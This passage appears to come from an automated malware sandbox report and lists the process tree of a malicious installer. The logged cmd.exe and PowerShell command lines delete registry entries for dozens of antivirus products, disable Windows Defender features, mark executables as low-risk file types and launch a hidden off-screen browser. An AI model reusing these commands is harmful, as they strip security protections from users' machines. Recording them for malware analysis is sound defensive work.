"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:3164
                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                "powershell" Get-MpPreference -verbose
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:6048
                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:2660
                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:3636
                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:664
                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:4764
                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:5528
                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:3432
                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:5024
                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:1228
                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:648
                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:2016
                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:3512
                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:4260
                                                                                                                                                                                                                                                                        • C:\ProgramData\ApplicationO\launcher.exe
                                                                                                                                                                                                                                                                          "C:\ProgramData\ApplicationO\launcher.exe" --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --window-size=1217,408 --window-position=2000,2000 --new-window https://www.youtube.com/watch?v=2e76HqJ5fKY
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:3492
                                                                                                                                                                                                                                                                            • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                              "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --window-size=1217,408 --window-position=2000,2000 --new-window --ran-launcher https://www.youtube.com/watch?v=2e76HqJ5fKY
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:5884
                                                                                                                                                                                                                                                                                • C:\ProgramData\ApplicationO\77.0.4054.277\opera_crashreporter.exe
                                                                                                                                                                                                                                                                                  C:\ProgramData\ApplicationO\77.0.4054.277\opera_crashreporter.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\ProgramData\ApplicationO\profile\data\Crash Reports" --crash-count-file=C:\ProgramData\ApplicationO\profile\data\crash_count.txt --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=77.0.4054.277 --initial-client-data=0x290,0x294,0x298,0x26c,0x29c,0x7ff9e570a328,0x7ff9e570a338,0x7ff9e570a348
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:5796
                                                                                                                                                                                                                                                                                  • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
                                                                                                                                                                                                                                                                                    "C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe" --type=gpu-process --field-trial-handle=1752,16930912571159602666,15577650797075969821,131072 --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 YaBrowser/20.9.3.136 Yowser/2.5 Safari/537.36" --start-stack-profiler --with-feature:address-bar-yandex-box=on --with-feature:aliexpress-modal=off --with-feature:booking-modal=off --with-feature:cashback-all-workspaces=on --with-feature:cast-media-route-provider=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:rollout-dna=on --with-feature:sd-suggestions-external=on --with-feature:search-tabs-synched-devices=off --with-feature:tutorials=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=on --with-feature:yandex-zen-news-next=off --with-feature:new-autoupdater-logic=on --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --with-feature:installer-opera-exe-in-root=off --ab_tests=DNA-72006-test:DNA-72006,DNA-86173-test:DNA-86173,DNA-90363-test5:DNA-90363 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1764 /prefetch:2
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:5268
                                                                                                                                                                                                                                                                                    • C:\ProgramData\ApplicationO\77.0.4054.277\opera.exe
